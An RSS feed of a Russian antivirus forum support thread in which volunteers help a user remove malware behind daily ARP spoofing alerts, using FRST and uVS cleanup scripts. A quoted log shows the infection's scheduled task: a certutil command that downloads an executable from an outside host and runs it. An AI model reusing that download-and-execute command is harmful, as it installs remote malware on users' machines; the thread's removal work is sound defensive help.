<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: Обнаружена атака путем подделки записей кэша ARP]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме Обнаружена атака путем подделки записей кэша ARP форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Sun, 03 May 2026 08:12:12 +0300</pubDate>
		<item>
			<title>Обнаружена атака путем подделки записей кэша ARP</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum3/topic16303/message111781/">Обнаружена атака путем подделки записей кэша ARP</a></b> <i>Каждый день выходит это сообщение</i> в форуме <a href="http://forum.esetnod32.ru/forum3/">Обращение в техническую поддержку</a>. <br />
			Хорошо :) <br />
			<i>30.01.2021 12:27:43, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum3/topic16303/message111781/</link>
			<guid>http://forum.esetnod32.ru/messages/forum3/topic16303/message111781/</guid>
			<pubDate>Sat, 30 Jan 2021 12:27:43 +0300</pubDate>
			<category>Обращение в техническую поддержку</category>
		</item>
		<item>
			<title>Обнаружена атака путем подделки записей кэша ARP</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum3/topic16303/message111779/">Обнаружена атака путем подделки записей кэша ARP</a></b> <i>Каждый день выходит это сообщение</i> в форуме <a href="http://forum.esetnod32.ru/forum3/">Обращение в техническую поддержку</a>. <br />
			Благодарю за помощь. Давно искал решение этой проблемы <br />
			<i>30.01.2021 12:21:54, Ramzi Sadigli.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum3/topic16303/message111779/</link>
			<guid>http://forum.esetnod32.ru/messages/forum3/topic16303/message111779/</guid>
			<pubDate>Sat, 30 Jan 2021 12:21:54 +0300</pubDate>
			<category>Обращение в техническую поддержку</category>
		</item>
		<item>
			<title>Обнаружена атака путем подделки записей кэша ARP</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum3/topic16303/message111777/">Обнаружена атака путем подделки записей кэша ARP</a></b> <i>Каждый день выходит это сообщение</i> в форуме <a href="http://forum.esetnod32.ru/forum3/">Обращение в техническую поддержку</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_cmaOCijI" href="/user/57011/" bx-tooltip-user-id="57011">Ramzi Sadigli</a> написал:<br />Я так понял: во всем был виноват Ace Stream<br />=============<br /><br />В задачах была ссылка на сайт который запускал исполняемый файл.<br /><noindex><a href="https://www.virustotal.com/gui/url/1940aabfdff63a8fe9d94861b32d35c59daf14b164622ddc86511a0e4e00248a/detection" target="_blank" rel="nofollow">https://www.virustotal.com/gui/url/1940aabfdff63a8fe9d94861b32d35c59daf14b164622ddc<WBR/>&shy;86511a0e4e00248a/detection</a></noindex><br /><br />
====code====
<pre>Полное имя&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HTTPS://BESTBLUES.TECH/APP/APP.EXE
Имя файла&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; HTTPS://BESTBLUES.TECH/APP/APP.EXE
Тек. статус&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ПОДОЗРИТЕЛЬНЫЙ&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Сохраненная информация&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;на момент создания образа
Статус&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Доп. информация&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; на момент обновления списка
Файл&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;SYSTEM32&#92;CMD.EXE
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Ссылки на объект&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Ссылка&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HKLM&#92;Software&#92;Microsoft&#92;Windows NT&#92;CurrentVersion&#92;Schedule&#92;TaskCache&#92;Tasks&#92;{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}&#92;Actions
Actions&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:&#92;Users&#92;RAMZES&#92;AppData&#92;Local&#92;Temp&#92;csrss&#92;scheduled.exe &#38;&#38; C:&#92;Users&#92;RAMZES&#92;AppData&#92;Local&#92;Temp&#92;csrss&#92;scheduled.exe /31340
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Ссылка&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HKLM&#92;Software&#92;Microsoft&#92;Windows NT&#92;CurrentVersion&#92;Schedule&#92;TaskCache&#92;Logon&#92;{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}</pre>
=============
<br /><br />+<br /><br />
====code====
<pre>Полное имя&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;USERS&#92;RAMZES&#92;APPDATA&#92;LOCAL&#92;TEMP&#92;CSRSS&#92;SCHEDULED.EXE
Имя файла&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SCHEDULED.EXE
Тек. статус&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ПОДОЗРИТЕЛЬНЫЙ 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
Сохраненная информация&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;на момент создания образа
Статус&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ПОДОЗРИТЕЛЬНЫЙ 
Инф. о файле&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Не удается найти указанный файл. 
Цифр. подпись&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; проверка не производилась
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Статус&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Путь до файла&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Типичен для вирусов и троянов
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Доп. информация&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; на момент обновления списка
Файл&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;SYSTEM32&#92;CMD.EXE
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Ссылки на объект&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Ссылка&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HKLM&#92;Software&#92;Microsoft&#92;Windows NT&#92;CurrentVersion&#92;Schedule&#92;TaskCache&#92;Tasks&#92;{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}&#92;Actions
Actions&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:&#92;Users&#92;RAMZES&#92;AppData&#92;Local&#92;Temp&#92;csrss&#92;scheduled.exe &#38;&#38; C:&#92;Users&#92;RAMZES&#92;AppData&#92;Local&#92;Temp&#92;csrss&#92;scheduled.exe /31340
Actions&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:&#92;Users&#92;RAMZES&#92;AppData&#92;Local&#92;Temp&#92;csrss&#92;scheduled.exe &#38;&#38; C:&#92;Users&#92;RAMZES&#92;AppData&#92;Local&#92;Temp&#92;csrss&#92;scheduled.exe /31340
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Ссылка&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HKLM&#92;Software&#92;Microsoft&#92;Windows NT&#92;CurrentVersion&#92;Schedule&#92;TaskCache&#92;Logon&#92;{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}&#92;</pre>
============= <br />
			<i>30.01.2021 11:15:08, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum3/topic16303/message111777/</link>
			<guid>http://forum.esetnod32.ru/messages/forum3/topic16303/message111777/</guid>
			<pubDate>Sat, 30 Jan 2021 11:15:08 +0300</pubDate>
			<category>Обращение в техническую поддержку</category>
		</item>
		<item>
			<title>Обнаружена атака путем подделки записей кэша ARP</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum3/topic16303/message111775/">Обнаружена атака путем подделки записей кэша ARP</a></b> <i>Каждый день выходит это сообщение</i> в форуме <a href="http://forum.esetnod32.ru/forum3/">Обращение в техническую поддержку</a>. <br />
			Я так понял: во всем был виноват Ace Stream Media Center &nbsp;и Ace Stream Player <img src="http://forum.esetnod32.ru/upload/main/smiles/5/icon_smile.gif" border="0" data-code=":)" data-definition="SD" alt=":)" style="width:16px;height:16px;" title="С улыбкой" class="bx-smile" /> <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118586">Fixlog.txt</a><br /><i>30.01.2021 11:07:07, Ramzi Sadigli.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum3/topic16303/message111775/</link>
			<guid>http://forum.esetnod32.ru/messages/forum3/topic16303/message111775/</guid>
			<pubDate>Sat, 30 Jan 2021 11:07:07 +0300</pubDate>
			<category>Обращение в техническую поддержку</category>
		</item>
		<item>
			<title>Обнаружена атака путем подделки записей кэша ARP</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum3/topic16303/message111774/">Обнаружена атака путем подделки записей кэша ARP</a></b> <i>Каждый день выходит это сообщение</i> в форуме <a href="http://forum.esetnod32.ru/forum3/">Обращение в техническую поддержку</a>. <br />
			Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:<br /><br />Запустите FRST и нажмите один раз на кнопку Fix и подождите. <br /><br /><br /><br />
====code====
<pre>&nbsp;&nbsp;

HKLM&#92;SOFTWARE&#92;Policies&#92;Microsoft&#92;Windows Defender: Restriction &#60;==== ATTENTION
Task: {5CA08649-520A-4263-96F3-D10FB12140A9} - &#92;Microsoft&#92;Windows&#92;BrokerInfrastructure&#92;BgTaskRegistrationMaintenanceTask -&#62; No File &#60;==== ATTENTION
FF HKU&#92;S-1-5-21-1895224048-345741818-4275738559-1001&#92;...&#92;Firefox&#92;Extensions: &#91;acewebextension_unlisted@acestream.org&#93; - C:&#92;Users&#92;RAMZES&#92;AppData&#92;Roaming&#92;ACEStream&#92;extensions&#92;awe&#92;firefox&#92;acewebextension_unlisted.xpi =&#62; not found
FF Plugin HKU&#92;S-1-5-21-1895224048-345741818-4275738559-1001: @acestream.net/acestreamplugin,version=3.1.32 -&#62; C:&#92;Users&#92;RAMZES&#92;AppData&#92;Roaming&#92;ACEStream&#92;player&#92;npace_plugin.dll &#91;No File&#93;


EmptyTemp:
Reboot:

</pre>
=============
<br />Программа FRST создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!<br /><br />Пишем по результату. <br />
			<i>30.01.2021 10:55:05, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum3/topic16303/message111774/</link>
			<guid>http://forum.esetnod32.ru/messages/forum3/topic16303/message111774/</guid>
			<pubDate>Sat, 30 Jan 2021 10:55:05 +0300</pubDate>
			<category>Обращение в техническую поддержку</category>
		</item>
		<item>
			<title>Обнаружена атака путем подделки записей кэша ARP</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum3/topic16303/message111773/">Обнаружена атака путем подделки записей кэша ARP</a></b> <i>Каждый день выходит это сообщение</i> в форуме <a href="http://forum.esetnod32.ru/forum3/">Обращение в техническую поддержку</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_l9fh4yeM" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />+<br />попробуйте выгрузить временно этот процесс<br />C:\USERS\RAMZES\APPDATA\ROAMING\UTORRENT\UTORRENT.EXE<br />=============<br />Временно отключить или как? <br />
			<i>30.01.2021 10:48:50, Ramzi Sadigli.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum3/topic16303/message111773/</link>
			<guid>http://forum.esetnod32.ru/messages/forum3/topic16303/message111773/</guid>
			<pubDate>Sat, 30 Jan 2021 10:48:50 +0300</pubDate>
			<category>Обращение в техническую поддержку</category>
		</item>
		<item>
			<title>Обнаружена атака путем подделки записей кэша ARP</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum3/topic16303/message111772/">Обнаружена атака путем подделки записей кэша ARP</a></b> <i>Каждый день выходит это сообщение</i> в форуме <a href="http://forum.esetnod32.ru/forum3/">Обращение в техническую поддержку</a>. <br />
			Проверял и удалил с помощью AdwCleaner<br />Логи здесь<br />Потом на FRST, логи тоже прикрепил. Дополнително что-то надо делать или это достаточно? <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118582">AdwCleaner[S00].txt</a><br /><a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118583">AdwCleaner[C00].txt</a><br /><a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118584">FRST.txt</a><br /><i>30.01.2021 10:40:13, Ramzi Sadigli.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum3/topic16303/message111772/</link>
			<guid>http://forum.esetnod32.ru/messages/forum3/topic16303/message111772/</guid>
			<pubDate>Sat, 30 Jan 2021 10:40:13 +0300</pubDate>
			<category>Обращение в техническую поддержку</category>
		</item>
		<item>
			<title>Обнаружена атака путем подделки записей кэша ARP</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum3/topic16303/message111771/">Обнаружена атака путем подделки записей кэша ARP</a></b> <i>Каждый день выходит это сообщение</i> в форуме <a href="http://forum.esetnod32.ru/forum3/">Обращение в техническую поддержку</a>. <br />
			+<br />попробуйте выгрузить временно этот процесс<br />C:\USERS\RAMZES\APPDATA\ROAMING\UTORRENT\UTORRENT.EXE <br />
			<i>30.01.2021 10:09:45, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum3/topic16303/message111771/</link>
			<guid>http://forum.esetnod32.ru/messages/forum3/topic16303/message111771/</guid>
			<pubDate>Sat, 30 Jan 2021 10:09:45 +0300</pubDate>
			<category>Обращение в техническую поддержку</category>
		</item>
		<item>
			<title>Обнаружена атака путем подделки записей кэша ARP</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum3/topic16303/message111767/">Обнаружена атака путем подделки записей кэша ARP</a></b> <i>Каждый день выходит это сообщение</i> в форуме <a href="http://forum.esetnod32.ru/forum3/">Обращение в техническую поддержку</a>. <br />
			1) Скопируйте текст КОДа - в буфер обмена.<br />uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена.<br />ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ!<br />ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !<br /> <br /><br />
====code====
<pre>
;uVS v4.11.3 &#91;http://dsrt.dyndns.org:8888&#93;
;Target OS: NTv10.0
v400c
OFFSGNSAVE
deltmp
restart
;---------command-block---------
delall %SystemDrive%&#92;USERS&#92;RAMZES&#92;APPDATA&#92;LOCAL&#92;TEMP&#92;CSRSS&#92;SCHEDULED.EXE
delref %SystemDrive%&#92;PROGRAM FILES&#92;COMMON FILES&#92;MICROSOFT SHARED&#92;OFFICE15&#92;OLICENSEHEARTBEAT.EXE
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}&#92;&#91;CLSID&#93;
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;IOBIT&#92;IOBIT UNINSTALLER&#92;IOBITUNINSTALER.EXE
delref %SystemRoot%&#92;SYSWOW64&#92;VID.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;PEERDISTSVC.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;TCPIP.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;APPVETWCLIENTRES.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;MRXSMB.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;W32TIME.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;NDIS.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;USBXHCI.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;SRV2.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;RDPCORETS.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;DXGMMS2.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;HTTP.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;WINNAT.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;UMPOEXT.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;VMBUSR.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;BTHSERV.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;DMVSC.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;IPHLPSVC.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;CSCSVC.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;SMBDIRECT.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;VMBKMCL.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;REFS.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;SPACEPORT.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;FVEVOL.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;AFD.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;PNRPSVC.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;PACER.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;HVHOSTSVC.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;LSM.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;SYNTH3DVSC.SYS
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}&#92;&#91;CLSID&#93;
delref {166B1BCA-3F9C-11CF-8075-444553540000}&#92;&#91;CLSID&#93;
delref {233C1507-6A77-46A4-9443-F871F945D258}&#92;&#91;CLSID&#93;
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}&#92;&#91;CLSID&#93;
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}&#92;&#91;CLSID&#93;
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}&#92;&#91;CLSID&#93;
delref %SystemRoot%&#92;SYSWOW64&#92;IE4USHOWIE.EXE
delref %SystemRoot%&#92;SYSWOW64&#92;IE4UINIT.EXE
delref P:&#92;LFSERVICE.EXE
delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}&#92;&#91;CLSID&#93;
delref %SystemRoot%&#92;SYSWOW64&#92;BLANK.HTM
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}&#92;&#91;CLSID&#93;
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}&#92;&#91;CLSID&#93;
delref {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}&#92;&#91;CLSID&#93;
delref {23170F69-40C1-278A-1000-000100020000}&#92;&#91;CLSID&#93;
delref P:&#92;LF37CONTEXT.DLL
delref {E61BF828-5E63-4287-BEF1-60B1A4FDE0E3}&#92;&#91;CLSID&#93;
delref {B298D29A-A6ED-11DE-BA8C-A68E55D89593}&#92;&#91;CLSID&#93;
delref {4A7C4306-57E0-4C0C-83A9-78C1528F618C}&#92;&#91;CLSID&#93;
delref %SystemDrive%&#92;USERS&#92;RAMZES&#92;APPDATA&#92;LOCAL&#92;MICROSOFT&#92;WINDOWS&#92;WINX&#92;GROUP2&#92;2 - SEARCH.LNK
delref %Sys32%&#92;DRIVERS&#92;VMBUSR.SYS
delref %Sys32%&#92;DRIVERS&#92;UMDF&#92;USBCCIDDRIVER.DLL
delref %Sys32%&#92;BLANK.HTM
delref %Sys32%&#92;DRIVERS&#92;HDAUDADDSERVICE.SYS
delref HELPSVC&#92;&#91;SERVICE&#93;
delref SACSVR&#92;&#91;SERVICE&#93;
delref TBS&#92;&#91;SERVICE&#93;
delref VMMS&#92;&#91;SERVICE&#93;
delref BROWSER&#92;&#91;SERVICE&#93;
delref MESSENGER&#92;&#91;SERVICE&#93;
delref RDSESSMGR&#92;&#91;SERVICE&#93;
delref P:&#92;BIN&#92;OLSERVICE.EXE
delref P:&#92;BIN&#92;OPCDB.EXE
delref P:&#92;BIN&#92;SYNCAGENTSERVICE.EXE
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;COMMON FILES&#92;MICROSOFT SHARED&#92;DAO&#92;DAO350.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;GOOGLE&#92;UPDATE&#92;1.3.35.442&#92;PSMACHINE_64.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;GOOGLE&#92;UPDATE&#92;1.3.36.32&#92;PSMACHINE_64.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;GOOGLE&#92;UPDATE&#92;1.3.35.452&#92;PSMACHINE_64.DLL
delref %Sys32%&#92;TETHERINGSETTINGHANDLER.DLL
delref %Sys32%&#92;QUICKACTIONSPS.DLL
delref %SystemDrive%&#92;PROGRAM FILES&#92;ADOBE&#92;ADOBE ILLUSTRATOR CC 2015&#92;ADOBE ILLUSTRATOR CC&#92;SUPPORT FILES&#92;CONTENTS&#92;WINDOWS&#92;ILLUSTRATOR.EXE
delref %SystemDrive%&#92;PROGRAM FILES&#92;COMMON FILES&#92;MICROSOFT SHARED&#92;DAO&#92;DAO360.DLL
delref P:&#92;BIN&#92;SCENEVIEWX.OCX
delref P:&#92;BIN&#92;SDENAVIGATION.DLL
delref P:&#92;BIN&#92;OPCSDE.DLL
delref P:&#92;BIN&#92;SCENEPLUGIN.DLL
delref P:&#92;BIN&#92;PGUEST.DLL
delref P:&#92;BIN&#92;INTEGRATOR.EXE
delref P:&#92;BIN&#92;CURRENTRATING.DLL
delref P:&#92;BIN&#92;SDEDB.DLL
delref P:&#92;BIN&#92;HTSDE2.OCX
delref P:&#92;BIN&#92;HTSDN2.OCX
delref P:&#92;BIN&#92;OPTASK.DLL
delref P:&#92;BIN&#92;OLREPORT.EXE
